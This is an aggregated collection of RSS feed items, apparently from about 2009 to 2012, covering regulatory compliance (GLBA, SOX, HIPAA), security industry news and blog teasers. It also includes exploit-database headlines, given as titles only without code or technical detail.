http://www.compliancehome.com/rss/resources-GLBA.xml With smartphones gaining traction in the consumer world, its easy to forget that handsets are simply mini computers that could contain sensitive data about business contacts and inter-office electronic communication. In addition to putting in place a procurement policy that includes checks and balances for who gets what type of wireless device and plan, as well as a usage policy to make sure employees arent overusing mobile services for personal use, implementing a solid security policy is also essential, said Pankaj PJ Gupta, founder and CEO of Amtel (News - Alert), a company that helps enterprises to rein in wireless management expenses and improve productivity.

==> Updated AMU Kit Offered to FaceTime's Unified Security Gateway 3.0

http://www.compliancehome.com/rss/resources-GLBA.xml A purveyor of applications designed to promote the secure use of Web 2.0 and unified communications in the commercial segment, FaceTime Communication, announced the commercial launch of its Augment, Migrate and Update, or AMU kit. The kit is devised for enterprises who are at the brink of expensive upgrades needed to maintain compliance with enterprise security and control standards, which are essential to manage the changing face of the Internet.

==> Former Chairman of the Federal Reserve Wants to Bring Back 1933 Glass-Steagall Act

http://www.compliancehome.com/rss/resources-GLBA.xml The former Chairman of the Federal Reserve [1979-1987], that Paul Volker, has advised the Obama Administration to bring back the 1933 Glass-Steagall Act [SGA]. The Glass-Steagall Act was repealed in 1999 and replaced with the Gramm-Leach-Bliley Act [GLBA]. The GLBA removed restrictions on commercial banks and investment banks allowing them gross latitude in activities and services. (Reem Heakel, 2009)

==> SOX, GLBA and HIPAA: Multiple Regulations, One Compliance Solution - Vendor Webcast

http://www.compliancehome.com/rss/resources-GLBA.xml SOX, GLBA and HIPAA share a common regulatory compliance thread - the need to use automation to ensure continuous compliance with required IT controls. View this webcast for an overview of each regulation. Also, gain an understanding of the capabilities an organization must have in place to address these requirements.

==> Data Security should be ensured by the Strategy

http://www.compliancehome.com/rss/resources-GLBA.xml Over the past few years, with the rise in incidents of identity theft many organizations are rightfully concerned about keeping their customers' data private. While the financial service industry has been regulated since the late '90s by the federal government, other companies would be wise to follow their lead. For some years now, financial service companies have had to comply with the provisions of the oft-maligned Gramm Leach Bliley Act. Among other things, GLBA calls for a process that begins with an assessment of an organization's information systems, development of a security strategy, implementation of the strategy and, finally, ongoing monitoring.

==> FDA's Growing Role Regulating Health 2.0, Health IT

http://www.compliancehome.com/rss/resources-GLBA.xml The federal regulation is part of the deal is very well known by many who are involved in the world of health IT. Issues of health information privacy have been subject to an array of federal and state laws for decades. HIPAA, the Federal Privacy Act, laws governing Medicaid, Medicare, the Veterans Health Administration, funds used for the treatment of mental illness, sexually transmitted infections and on and on all have privacy provisions. There is a similar regulatory scheme for data security, again including HIPAA, the Gramm-Leach-Bliley Act and other laws.

==> SOX, GLBA and HIPAA: Multiple Regulations, One Compliance Solution

http://www.compliancehome.com/rss/resources-GLBA.xml SOX, GLBA and HIPAA share a common regulatory compliance thread - the need to use automation to ensure continuous compliance with required IT controls. These regulations require technical safeguards to protect or guarantee the veracity of critical information. With SOX, its for public companies to guarantee accurate financial accounting. GLBA protects personal financial information of an organizations customers. And HIPAA protects and guarantees the privacy of an individuals personal health information (PHI). What all three have in common is the requirement for specific IT controls. Learn more about these regulations and how to automate manual processes with an integrated change auditing and configuration control solution.

==> Severance of Duties in Virtualized Environments

http://www.compliancehome.com/rss/resources-GLBA.xml With Virtualization we have moved a step closer to the world of Star Trek. Think back to episodes of The Next Generation where Geordi was able to control the functions of the entire ship through a single touch-screen interface. He was able to reconfigure electrical, mechanical and propulsion systems without needing anyone else or additional authorization. The only thing to prevent him from doing something risky or damaging was the computer system itself.

==> SOX, GLBA and HIPAA: Multiple Regulations, One Compliance Solution

http://www.compliancehome.com/rss/resources-GLBA.xml SOX, GLBA and HIPAA share a common regulatory compliance thread - the need to use automation to ensure continuous compliance with required IT controls. These regulations require technical safeguards to protect or guarantee the veracity of critical information. With SOX, its for public companies to guarantee accurate financial accounting. GLBA protects personal financial information of an organizations customers. And HIPAA protects and guarantees the privacy of an individuals personal health information (PHI). What all three have in common is the requirement for specific IT controls. Learn more about these regulations and how to automate manual processes with an integrated change auditing and configuration control solution.

==> Availability of OfficeScreen Complete Announced by ANXeBusiness Corp.

http://www.compliancehome.com/rss/resources-GLBA.xml A leading provider of networking and security managed services, ANXeBusiness Corp., announced the availability of OfficeScreen Complete, a fully managed security solution providing comprehensive protection from web-based threats, advanced remote access capabilities, and productivity enhancement tools. Built upon two powerful security technologies - ANX OfficeScreen and ANX PositivePro - OfficeScreen Complete combines an award-winning managed firewall, site-to-site VPN, URL filtering, and remote access technology into one hosted solution. Additionally, when supporting five or more users, OfficeScreen Complete can also include wireless access point security, traffic shaping, and Internet failover support.

==> Bank compliance laws need to be streamlined to really help consumers

http://www.compliancehome.com/rss/resources-GLBA.xml In todays scenario is gets must for the banks to devote an huge amount of time and resources, at great expense, to keeping up with the never-ending cascade of new laws and regulations and keeping in compliance with the myriad existing ones. Before Congress enacts legislation implementing the part of the administration's regulatory reform proposal that calls for the establishment of a new Consumer Financial Protection Agency, it should take a close look at the compliance burdens already heaped upon banks.

==> Vital Information Security and Compliance Activities for 2010

http://www.compliancehome.com/rss/resources-GLBA.xml It has always been a challenge for businesses and organizations of all sizes to manage the security of critical information. Even companies that invest in the latest security infrastructure and tools soon discover that these technology-based solutions are short-lived.

==> Data Loss Prevention not a solution

http://www.compliancehome.com/rss/resources-GLBA.xml One of the powerful tools that many organizations are using to prevent the unauthorized copying or transmission of confidential or personal data is Data Loss Prevention (DLP). Organizations spend a tremendous amount of money and time to set up firewalls and intrusion detection solutions to prevent attackers from the outside from gaining access to internal assets. However, what about the internal threat? A Web page, an e-mail with a client list, or personal data copied to a USB drive are all examples of data that can leave an organization unmonitored and undetected.

==> PCI - It's Not Quite Everywhere It Should Be

http://www.compliancehome.com/rss/resources-GLBA.xml Join this webinar to learn about critical technologies that can assist your PCI compliance efforts. We will discuss how to: Protect critical data from leaving your enterprise through malicious hackers and/or employee mistakes Go beyond intrusion detection and prevention to a positive, proactive, security model that protects against new email and web-borne attacks Safely enable remote employees, partners, contractors and other third parties to authenticate and access pertinent information Implement security measures that ensure simultaneous compliance with PCI, SOX, GLBA, HIPAA and other privacy and data protection regulations

==> Real-Life Log Management Challenges for Financial Institutions

http://www.compliancehome.com/rss/resources-GLBA.xml With hundreds and thousands of automated systems producing log data, an organization's ability to respond to

==> Email Security and Archiving - Clearer in the Cloud

http://www.compliancehome.com/rss/resources-GLBA.xml The time is NOW for businesses and organizations of all sizes to implement cloud computing solutions for email security and archiving. Cloud computing solutions are more effective than traditional, on-premise solutions and at a fraction of the cost and IT resource requirements. Listen to this live TechRepublic Webcast, featuring moderator Steve Kovsky and featuring special guests Michael Osterman, President of Osterman Research and Adam Swidler with Google. They present findings, regarding the latest research comparing cloud solutions with on-premise solutions.

==> PCI - It's Not Quite Everywhere It Should Be

http://www.compliancehome.com/rss/resources-GLBA.xml Learn about critical technologies that can assist your PCI compliance efforts. We will discuss how to: Protect critical data from leaving your enterprise through malicious hackers and/or employee mistakes Go beyond intrusion detection and prevention to a positive, proactive, security model that protects against new email and web-borne attacks Safely enable remote employees, partners, contractors and other third parties to authenticate and access pertinent information Implement security measures that ensure simultaneous compliance with PCI, SOX, GLBA, HIPAA and other privacy and data protection regulations

==> Generating grounds for identity theft

http://www.compliancehome.com/rss/resources-GLBA.xml The federal GLBA, HIPAA, FACTA and its Red Flags and Disposal Rules, state data Breach Notification Laws and hundreds of other federal and state laws and industry regulations like PCI-DSS are intended to protect the privacy and security of consumers personally identifiable and financial information entrusted to businesses and other organizations. Many such regulations aim to prevent identity theft and privacy violations.

==> The Price of Not Complying With GLBA

http://www.compliancehome.com/rss/resources-GLBA.xml The Gramm-Leach-Bliley Act (GLBA) requires financial institutions to create and maintain an information security program to protect customer information. This webcast highlights GLBA and Technology safeguards, the price of not complying, how to identify technology compliance areas, compliance policy and process - who implements and how, and Tripwire GLBA Product/Service offerings.

==> SAS 70 Certification Completed by CRG West

http://www.compliancehome.com/rss/resources-GLBA.xml A developer, manager and operator of data centers, CRG West, has completed SAS (News - Alert) 70 Type II certification at the companys Boston and Chicago data centers. The company believes the completion of this certification process in Boston and Chicago has made the outsourced data center selection process more efficient for prospective customers from all industries.

==> CIO Strategies for Retention and Deletion of Email and Electronic Information

http://www.compliancehome.com/rss/resources-GLBA.xml Over the past two years, major changes to the Federal Rules of Civil Procedure (FRCP) and the increase in state and federal compliance regulations have created new challenges for companies as they struggle to manage email retention and deletion policies. To successfully maintain compliance and protect their business in the event of litigation, companies must understand these changes. Implementing new strategies for email will enable organizations to effectively set and manage email retention and deletion policies, as well as provide robust search and e-Discovery capabilities to respond rapidly to litigation.

==> Improve Performance, Reduce Data Growth Costs - Archiving ERP Applications

http://www.compliancehome.com/rss/resources-GLBA.xml View this Webcast to find out from the experts how effective application archiving can help you effectively manage your production database, control data growth, and ultimately improve your bottom line.

==> Using Email Encryption to Enforce Security Policies for PCI, GLBA & HIPAA Compliance

http://www.compliancehome.com/rss/resources-GLBA.xml Ensuring your organization complies with today's increasingly complex regulations and industry mandates around email and data security can be both a legal and technical mine field.First you need to understand what data should be protected. Then you need to determine who in your organization has access to that data and is sending it to people outside of the organization. You also need to invest in technology to enforce your compliance policies. It can be intimidating for any IT department. Hearing how your peers have tackled these challenges can help you plan your approach to finding a solution. Watch the webinar,

==> Email is Critical...and Out of Control!

http://www.compliancehome.com/rss/resources-GLBA.xml More than 75% of the average company's intellectual property is contained in email messages and their attachments. As a result, email has quickly become the file server of choice for most of us - and a headache for compliance managers.The value of unified information access to live and archived email via desktop or mobile device is becoming increasingly important for today's businesses - from end users to the board room, where compliance is an ongoing pain point.

==> The Top 10 Benefits of SaaS-enabled Email Management

http://www.compliancehome.com/rss/resources-GLBA.xml Email is indisputably the most important business application for most organizations. Yet, managing it has always been a no-win proposition. Add the pressure of fewer people and resources as well as shrinking budgets these days, and it seems that the pain of managing email can only get worse. But don't despair, there's a new breed of managed SaaS-enabled email services that are modular, reliable, and secure for virtually any type of business.

==> Improve Performance, Reduce Data Growth Costs - Archiving ERP Applications

http://www.compliancehome.com/rss/resources-GLBA.xml View this Webcast to find out from the experts how effective application archiving can help you effectively manage your production database, control data growth, and ultimately improve your bottom line.

==> Tech Insight: What Penetration Testers Find Inside Your Network

http://www.darkreading.com/rss/all.xml Inside flaws include unpatched systems, open file shares or information stores, and lack of proper network segmentation

==> Zero-Day Attacks Long-Lived, Presage Mass Exploitation

http://www.darkreading.com/rss/all.xml Zero-day attacks escape detection for an average of 10 months; once they go public, attacks multiply dramatically, researchers find

==> Citadel Trojan Gets More Customer-Friendly

http://www.darkreading.com/rss/all.xml RSA says 'Rain Edition' offers dynamic configuration for bots, friendlier user interface

==> Apple Removes Default Java Support In Browsers

http://www.darkreading.com/rss/all.xml Some Java security headache relief for Mac users

==> Product Watch: New Fortinet Tools Help Enforce Policy By Device, Reputation

http://www.darkreading.com/rss/all.xml FortiOS 5.0 enables enterprises to restrict user access based on behavior, device ownership

==> Could Hackers Change Our Election Results?

http://www.darkreading.com/rss/all.xml Many of the same vulnerabilities exist in electronic voting systems as the last time we elected a president, and new ones abound that could put voter databases at risk and undermine civic confidence

==> Adobe Bolsters Security In Reader, Acrobat XI

http://www.darkreading.com/rss/all.xml Adobe builds on its sandboxing protections as part of a series of moves to improve security

==> The Secure Operating System Equation

http://www.darkreading.com/rss/all.xml Many experts like the idea of a purpose-built, secure operating system. It's just that adopting one is not so straightforward, even if it's specifically for security-strapped SCADA systems

==> What Huawei, ZTE Must Do To Regain Trust

http://www.darkreading.com/rss/all.xml A recently issued U.S. congressional report has cast a shadow on Chinese telecom equipment makers Huawei and ZTE. Because neither company answered congressional queries to the satisfaction of U.S. lawmakers, the report concludes that the two companies, as a result of ties to the Chinese government, cannot be trusted to supply telecommunications equipment to U.S. government agencies or U.S. companies. Both companies vigorously argued against the report's conclusions. Huawei condemned the report as an attempt "to impede competition and obstruct Chinese [telecom] companies from entering the U.S. market." ZTE insisted its equipment is safe and that congressional concernsimplicate "every company making equipment in China, including Western vendors." U.S. lawmakers worry that Chinese-made telecom equipment could contain a hidden backdoor that could be used to eavesdrop on sensitive communications or to disrupt network infrastructure. The version of the report released to the public (a separate classified annex was withheld) contains no evidence that Huawei or ZTE have compromised their products at the behest of Chinese officials. But lack of transparency into the workings of the two companies and lack of answers to lawmakers' queries, in conjunction with ongoing reports about cyber attacks traced to China, have made it difficult for U.S. authorities to trust either company.

==> 3 Must-Fix Vulnerabilities Top Oracle CPU Patches

http://www.darkreading.com/rss/all.xml Two CVSS 10.0 and one 9.0 flaws top the charts on a Critical Patch Update list chock full of remotely exploitable vulnerabilities

==> Communication Confidential: Startup Offers P2P Encrypted Voice, Text, Video

http://www.darkreading.com/rss/all.xml Startup Silent Circle rolls out encrypted text, voice, video -- and soon, email -- for the ultra privacy- and security-conscious

==> Meet Flame Espionage Malware Cousin: MiniFlame

http://www.darkreading.com/rss/all.xml Ongoing teardowns of the Flame malware and its underlying components have yielded a surprising discovery: a new piece of malware. Security researchers at Kaspersky Lab said that what they previously suspected was an attack module for the Flame malware is instead a standalone piece of attack code, although it can do double duty as a plug-in for both the Flame and Gauss malware. Designed for data theft and for providing attackers with direct access to an infected system, MiniFlame is based on the same architectural platform as Flame, according to Kaspersky Lab. "MiniFlame is a high-precision attack tool," said Alexander Gostev, chief security expert at Kaspersky Lab, in an emailed statement. "Most likely it is a targeted cyberweapon used in what can be defined as the second wave of a cyberattack ... to conduct more in-depth surveillance and cyber-espionage."

==> Keeping Data Out Of The Insecure Cloud

http://www.darkreading.com/rss/all.xml Companies looking to keep their data safe need to give their employees a choice of solid file-sharing services and apps. Otherwise, it's back to their insecure favorites

==> Researchers Identify Banks Targeted In Forthcoming Attack

http://www.darkreading.com/rss/all.xml Bank of America, Chase, Citibank said to be among institutions under the gun from planned Gozi-Prinimalka malware attack

==> A False Sense Of Security

http://www.darkreading.com/rss/all.xml Cutting-edge security technologies are critical to safeguarding data integrity. However, organizations need to also focus on developing effective policies and practices to fully protect crucial information assets

==> Next-Generation Malware: Changing The Game In Security's Operations Center

http://www.darkreading.com/rss/all.xml Sophisticated, automated malware attacks are spurring enterprises to shift their security technology, staffing strategies

==> BYOD: Filling The Holes In Your Security Policy

http://www.darkreading.com/rss/all.xml Allowing personal mobile devices at work can create new risks for your enterprise. Is your security policy ready?

==> U.S. Defense Secretary Sends Veiled Warning To Iran

http://www.darkreading.com/rss/all.xml Panetta says Tehran is developing cyberplans; former official says U.S. has linked Iran to attack at Saudi Aramco

==> Security Monitoring An Elixir For Intrusion Costs?

http://www.darkreading.com/rss/all.xml A recent study of the costs of cybercrime finds that security intelligence, including monitoring and threat intelligence, reduces the costs of cyberattacks the most

==> Bolster SMB Security Practices, Budgets Through Risk Management

http://www.darkreading.com/rss/all.xml Simplification of risk quantification, smart partnering, and automation all play a role in helping SMBs take advantage of IT risk management benefits

==> Popular RATs Found Riddled With Bugs, Weak Crypto

http://www.darkreading.com/rss/all.xml Research by former interns for Matasano Security exposes flaws in remote administration tools

==> Finding Against Chinese Firms Has Lessons For Security Professionals Beyond Mere Avoidance

http://www.darkreading.com/rss/all.xml Sometimes the biggest threats to data security hide in plain sight

==> Florida University Breach Exposes Data On 279,000

http://www.darkreading.com/rss/all.xml At least 50 Northwest Florida State College employees hit by identity theft at this point -- including the university's president

==> Report: Four Out Of Five Phishing Attacks Use Security Scams

http://www.darkreading.com/rss/all.xml Phishers scare users into clicking by sending security 'alerts,' Websense says

==> Dodging 5 Dangerous Database Default Settings

http://www.darkreading.com/rss/all.xml Out-of-the-box settings and weak configuration of databases make it easier for thieves to break into data stores and harder for IT to quickly detect breaches

==> HSBC Latest Financial Company Hit in Wave of DDoS Attacks

http://www.eweek.com/rss-feeds-45.xml HSBC joins the list of financial companies recently hit by hackers. A group affiliated with Anonymous has taken credit for the attack.

==> Zero-Day Attacks Escape Detection for Nearly a Year: Symantec Study

http://www.eweek.com/rss-feeds-45.xml Attacks using undisclosed "zero-day" vulnerabilities remain hidden for anywhere from 19 days to 30 months, according to new research that found 11 previously undetected attacks.

==> Kaspersky Lab Developing Secure OS for Industrial Control Systems

http://www.eweek.com/rss-feeds-45.xml A secure operating system designed specifically for critical infrastructure companies will provide a new layer of protection against attacks, the security firm says.

==> Cyber-Security Threats Unaddressed by Small Businesses: Symantec

http://www.eweek.com/rss-feeds-45.xml Small-business owners are woefully unprepared when it comes to protecting their companies from various forms of internal and external security threats.

==> Google Privacy Policies Assailed by EU: Report

http://www.eweek.com/rss-feeds-45.xml Google isn't being clear enough about how it uses consumer data that it collects from its users, says the European Union.

==> British Hacker McKinnon Wins Long Fight Against Extradition to U.S.

http://www.eweek.com/rss-feeds-45.xml Gary McKinnon will not face extradition to the U.S. on charges of hacking military computers, according to a decision today by Britain's home secretary. British authorities must now decide if he will face charges in the U.K.

==> Courion Access Insight Detects Data Security Risks at HCR ManorCare

http://www.eweek.com/rss-feeds-45.xml HCR ManorCare is using Courion's Access Insight application to develop reports on risks to patient data privacy and to prevent security breaches.

==> MiniFlame Backdoor Steals Middle East Data

http://www.eweek.com/rss-feeds-45.xml Security firms find a program linked to the Flame and Gauss cyber-spy tools that steals data from and provides access to high-profile targets.

==> Iranian Cyber-Attack Is Most Destructive to Date Says Defense Secretary

http://www.eweek.com/rss-feeds-45.xml Leon Panetta warns Iran that the United States is prepared to take action against cyber-attacks if national interests are threatened as the Pentagon readies cyber-defenses.

==> Data Breach Leads to Identity Theft at Northwest Florida State College

http://www.eweek.com/rss-feeds-45.xml An attack on Northwest Florida State College computer systems resulted in a data breach that has affected nearly 300,000 people and led to reports of identity theft and fraud.

==> More Banks Come Under Denial-of-Service Attack

http://www.eweek.com/rss-feeds-45.xml Capital One and SunTrust came under attack this week using denial-of-service techniques that are evading defenses meant to blunt such attacks.

==> Firefox 16 Re-Released After Serious Security Flaw Is Patched

http://www.eweek.com/rss-feeds-45.xml Less than 24 hours after removing the Firefox 16 browser from its downloads page after a security flaw surfaced, Mozilla re-releases Firefox 16.

==> Irish Google, Yahoo Domains Taken Offline Briefly After Security Breach

http://www.eweek.com/rss-feeds-45.xml Users of Google.ie and Yahoo.ie were impacted by the incident, which stemmed from an unauthorized access of a registrar's account. The DNS name server records of both domains were changed to point to other name servers associated with well-known hacking sites, officials say.

==> Certificate Authority Security: Seven Ways to Defend Against Hacking

http://www.eweek.com/rss-feeds-45.xml We detail some advice from Venafi, GlobalSign and others that can help keep CAs safe, and help your organization in the event of a CA compromise.

==> [dos] - Internet Explorer 9 XSS Filter Bypass

http://www.exploit-db.com/rss.php Internet Explorer 9 XSS Filter Bypass

==> [webapps] - CMSQLITE v1.3.2 Multiple Vulnerabiltiies

http://www.exploit-db.com/rss.php CMSQLITE v1.3.2 Multiple Vulnerabiltiies

==> [webapps] - Joomla Tags (index.php, tag parameter) SQL Injection

http://www.exploit-db.com/rss.php Joomla Tags (index.php, tag parameter) SQL Injection

==> [webapps] - Joomla Freestyle Support 1.9.1.1447 (com_fss) SQL Injection

http://www.exploit-db.com/rss.php Joomla Freestyle Support 1.9.1.1447 (com_fss) SQL Injection

==> [papers] - Whitepaper : Exploiting Transparent User Identification

http://www.exploit-db.com/rss.php Whitepaper : Exploiting Transparent User Identification

==> [remote] - ManageEngine Security Manager Plus <= 5.5 build 5505 Remote SYSTEM SQLi (MSF)

http://www.exploit-db.com/rss.php ManageEngine Security Manager Plus <= 5.5 build 5505 Remote SYSTEM SQLi (MSF)

==> [remote] - ManageEngine Security Manager Plus <= 5.5 build 5505 Remote SYSTEM/root SQLi

http://www.exploit-db.com/rss.php ManageEngine Security Manager Plus <= 5.5 build 5505 Remote SYSTEM/root SQLi

==> [webapps] - ManageEngine Security Manager Plus <= 5.5 build 5505 Path Traversal

http://www.exploit-db.com/rss.php ManageEngine Security Manager Plus <= 5.5 build 5505 Path Traversal

==> [webapps] - OTRS 3.1 Stored XSS Vulnerability

http://www.exploit-db.com/rss.php OTRS 3.1 Stored XSS Vulnerability

==> [local] - Oracle Database Authentication Protocol Security Bypass

http://www.exploit-db.com/rss.php Oracle Database Authentication Protocol Security Bypass

==> Well Websecurify Runs on The iPhone

http://www.gnucitizen.org/feed/ This is not necessarily news anymore since it was discussed on the Websecurify official blog but we are so excited about it that we could not hold ourselves from posting it here too. The testing engine used in this particular version of Websecurify is optimized to run with the least possible amount of memory. The results of the scanner are as good as those produced by all other Websecurify variants although in some cases it may miss some statistically unlikely types of issues. [...]

==> Stuxnet

http://www.gnucitizen.org/feed/ I have been avoiding the topic about Stuxnet for quite some time, mainly because there were many others who spent the time to take the virus apart. However, here is a video, which I find rather amusing: Wether this is the real deal or simply fear mongering, I simply don’t know. It is all speculations at the moment. [...]

==> Having fun with BeEF, the browser exploitation framework

http://www.gnucitizen.org/feed/ We haven’t featured any guest bloggers in a while, but we’re glad to be featuring Chirstian Frichot this month! Christian is a security professional based in Perth, Western Australia. He’s currently working in the finance industry as part of a tight-knit internal team of security consultants doing their best to protect their business and customers from technical threats such as malware or insecure web applications. [...]

==> ColdFusion directory traversal FAQ (CVE-2010-2861)

http://www.gnucitizen.org/feed/ A new Adobe hotfix for ColdFusion has been released recently. The vulnerability which was discovered by Richard Brain, was rated as important by Adobe and could affect a large number of Internet-facing web servers. The FAQ bellow is meant to shed some light on this vulnerability so that ColdFusion administrators can understand what they’re up against. [...]

==> 1ST European Edition of HITB Coming Up!

http://www.gnucitizen.org/feed/ In case you haven’t heard yet, HITBSecConf is hosting the first European Edition of their conference in Amsterdam during 1st-2nd July ’10. The history of the HITB conferences can be traced back to 2002, the year in which the first ever edition of HITB took place in Malaysia. Since then, HITB has grown to become the biggest technical computer security event in Asia and has extended their presence to the Middle East and now Europe. [...]

==> Hacking Linksys IP Cameras (pt 6)

http://www.gnucitizen.org/feed/ This article is a continuation of the following GNUCITIZEN articles: here, here, here, here and here. As we know, there are several ways one could go about hunting for IP cameras on the net. The slowest way would be to portscan random IP addresses for certain ports and programmatically detect if the web interface of a given camera was available on the open ports found. [...]

==> Dnsmap v0.30 is now out!

http://www.gnucitizen.org/feed/ After working on dnsmap for a few months whenever time allowed, I decided there were enough additional goodies to make version 0.30 a new public release. Let me just say that a lot of the bugs that have been fixed, and features that have been added to this version would not be possible without the feedback from great folks such as Borys Lacki (www.bothunters.pl), Philipp Winter (7c0.org) and meathive (kinqpinz.info). Thanks guys, your feedback was highly valuable to me. [...]

==> Old-school Remote Command Exec Vulnerabilities on Avaya Intuity

http://www.gnucitizen.org/feed/ Remember those old remote command exec vulns where you had a CGI script such as a perl program which would take input from the client to construct command strings that would then be passed to the shell environment? Well, there were tons of those affecting diagnostic scripts available on the web interface of Avaya Intuity Audix LX. These vulnerabilities, although cool, are not critical since you need to be logged into the interface in order to exploit them. [...]

==> Skydive

http://www.gnucitizen.org/feed/ What is the best way to spend a quiet, weekend afternoon? – Jump off a perfectly working plane while 10,000 feet in the air. On 5th of July 2009, the GNUCITIZEN team and friends came together to perform a skydiving gig. [...]

==> Free Web Application Security Testing Tool

http://www.gnucitizen.org/feed/ Automated Web Application Security Testing tools are in the core of modern penetration testing practices. You cannot rely 100% on the results they produce, without considering seriously their limitations. However, because these tools are so good at picking the low-hanging fruit by employing force and repetition, they still have a place in our arsenal of penetrating testing equipment. These tools are not unfamiliar to modern day penetration testers. [...]

==> Of Sec Cons and Magstripe Gift Cards

http://www.gnucitizen.org/feed/ I’ve been meaning to talk about CONFidence and EUSecWest for quite a while, but May was such an intense month for me, that’s hardly left me with any time for other things. I eventually got caught up with other matters, which resulted in me publishing this post about 2 months late. I’ve been researching, pentesting, and preparing two different presentations which I gave at CONFidence in Krakow, and EUSecWest in London. pdp has also been busy presenting at AusCERT2009. [...]

==> CVE-2009-1151: phpMyAdmin Remote Code Execution Proof of Concept

http://www.gnucitizen.org/feed/ I couldn’t find any public PoC/exploit for this phpMyAdmin vulnerability, despite it being a serious bug affecting a popular open-source project. I think this vulnerability is a nice reminder that it’s still possible to perform remote command execution these days without relying on SQL injection (i.e.: xp_cmdshell) or a memory corruption bug (i.e.: heap overflow). [...]

==> Hacking Linksys IP Cameras (pt 5)

http://www.gnucitizen.org/feed/ This article is a continuation of the following GNUCITIZEN articles: Hacking Linksys IP Cameras (pt 1), Hacking Linksys IP Cameras (pt 2), Hacking Linksys IP Cameras (pt 3), Hacking Linksys IP Cameras (pt 4). Mounting the filesystem on your workstation There are many ways to mount the camera’s filesystem using the firmware binary. In this post, we’ll explain one way to mount firmware version v1.00R24 which is the latest available for the WVC54GCA model. [...]

==> Breaking Into a Home With an iPhone

http://www.gnucitizen.org/feed/ This is going to be one of these quick posts which just makes you think what the information security landscape will be like in 5 years. Before I move on with my commentary, here is a video which is essential for you to watch. Got the idea? No? Let me explain. What you see in the video above is an application for the iPhone which gives you detailed characteristics of properties (houses) in USA. [...]

==> Extensions at War

http://www.gnucitizen.org/feed/ Oh yes, the digital battlefield is taking unusual shapes. The latest manifestation of cyber warfare is a conflict between the Adblock Plus and the NoScript extensions. The story goes that NoScript used some JavaScript tactics and, of course, some obfuscations in order to cripple the Adblock Plus functionalities. This attack was a response to Adblock Plus blocking NoScript ads which you see when you upgrade the extension, which as you know happens quite regularly, don’t know why. [...]

==> Exploit Sweatshop

http://www.gnucitizen.org/feed/ When I was playing/introducing the partial disclosure practice an year and something ago, I did get contacted by numerous dodgy characters willing to buy yet undisclosed vulnerabilities for substantial amount of money. Of course, requests of that nature were kindly ignored. I couldn’t believe that someone was willing to give me so much money for something I virtually spent 2-3 hours maximum to produce. [...]

==> Jeriko Group and Source Code Repository

http://www.gnucitizen.org/feed/ Jeriko moved in its own source code repository which you will be able to find here. There is also a discussion group here, if you feel like using it. The version inside the new code repository is very different from the version you’ve seen before. The main difference is that while the old version is basically a collection of scripts, the new version implements its own shell (wrapper around bash) which does the heavily lifting and also introduces some funky programming mechanisms. [...]

==> Hacking Linksys IP Cameras (pt 4)

http://www.gnucitizen.org/feed/ This article is a continuation of the following GNUCITIZEN articles, which include an introduction to the topic and also some initial observations: Hacking Linksys IP Cameras (pt 1), Hacking Linksys IP Cameras (pt 2), Hacking Linksys IP Cameras (pt 3). There are two types of vulnerabilities I will be releasing today: disclosure of credentials in client-side source code and multiple XSS. [...]

==> Hacking Linksys IP Cameras (pt 3)

http://www.gnucitizen.org/feed/ This article is a continuation of the following GNUCITIZEN articles, which include an introduction to the topic and also some initial observations: Hacking Linksys IP Cameras (pt 1), Hacking Linksys IP Cameras (pt 2). Unlike the previous two vulnerabilities I released, the vulnerabilities I’m releasing in this post are perhaps not so useful to break into the device as you need access to the admin account to exploit them. [...]

==> Hacking Linksys IP Cameras (pt 2)

http://www.gnucitizen.org/feed/ This article is a continuation of the following GNUCITIZEN article, which includes an introduction to the topic and also some initial observations: Hacking Linksys IP Cameras (pt 1). Privilege escalation via arbitrary file retrieval The second vulnerability I’ll be releasing is an arbitrary(ish) file retrieval vulnerability. It’s not fully arbitrary because you can only retrieve the contents of files located within the same directory where the vulnerable CGI program is located. [...]

==> Key Parts of Ubuntu 13.04 Will Be Developed in Secret

http://www.hackinthebox.org/backend.php http://www.extremetech.com/wp-content/uploads/2012/10/ubuntu-logo-348x196.jpg In a twist that is sure to raise eyebrows and cause no end of neckbeard scratching, Canonical founder and Ubuntus de facto spiritual leader, Mark Shuttleworth, has announced that key parts of Ubuntu 13.04 will be developed in secret. Tags: UbuntuLinuxSecurity

==> FTC puts a bounty on the heads of robo-telemarketers

http://www.hackinthebox.org/backend.php http://cdn.arstechnica.net/wp-content/uploads/2012/10/red_telephone2.jpeg The race against robots is on: the Federal Trade Commission is offering $50,000 cash to anyone that can come up with a way to eliminate the insidious telemarketing robocall, it announced Thursday. While it may take a sizable workload, a good kill-switch for the spammy pre-recorded messages could put an end to the annoying overtures on the phone to enter a new sweepstakes, qualify for a new credit card, or get a new energy provider. Tags: Industry NewsFTC

==> Hack In The Box 2012 Malaysia: Like No Other

http://www.hackinthebox.org/backend.php http://cdn-static.zdnet.com/i/r/story/70/00/005720/original/hack-in-the-box-2012-620x.jpeg?hash=ZmtkMGWwMJ Hack In The Box SecConf 2012 Malaysiajust celebrated its ten-year mark in Kuala Lumpur, Malaysia. Hack In The Box stages its high-profile hacker conferences in Asia, the Middle East and Europe, bringing together an unusual mix of security professionals, members of the hacker underground, researchers and - yes - law enforcement. Tags: HITBHITB2012KULIndustry News

==> Analysis of How Bitcoin Is Actually Used

http://www.hackinthebox.org/backend.php http://en.wikipedia.org/wiki/Bitcoin The Bitcoin scheme is a rare example of a large scale global payment system in which all the transactions are publicly accessible (but in an anonymous way). We downloaded the full history of this scheme, and analyzed many statistical properties of its associated transaction graph. Tags: BitCoinIndustry News

==> New Citadel trojan costs more, but allows for easier updates

http://www.hackinthebox.org/backend.php http://i.haymarket.net.au/News/20120703113706_citadel%20trojan%20ss.png Code writers behind the latest Citadel trojan, dubbed the "Rain Edition," have added advanced features and significantly boosted the price tag of the malware. The new iteration includes a feature, called "Dynamic Config," which allows botmasters easier access to compromised victims' machines by updating the malware's configuration file immediately. Configuration files are used by owners of command-and-control servers to communicate malicious instructions to hacked PCs under their control. Tags: Viruses & Malware

==> Ubuntu 12.10 "Quantal Quetzal" officially released

http://www.hackinthebox.org/backend.php http://www.h-online.com/imgs/43/9/3/4/8/7/4/01amazon-dash-03649164378becb1.png Nearly six months after Ubuntu 12.04 LTS arrived, Canonical and the Ubuntu developers have released version 12.10 of their Ubuntu Linux distribution, code-named "Quantal Quetzal". The new version of the popular open source operating system uses a kernel based on the 3.5 Linux kernel and updates Unity desktop with a number of new features and enhancements. Tags: UbuntuLinux

==> Sprint acquires controlling stake in Clearwire

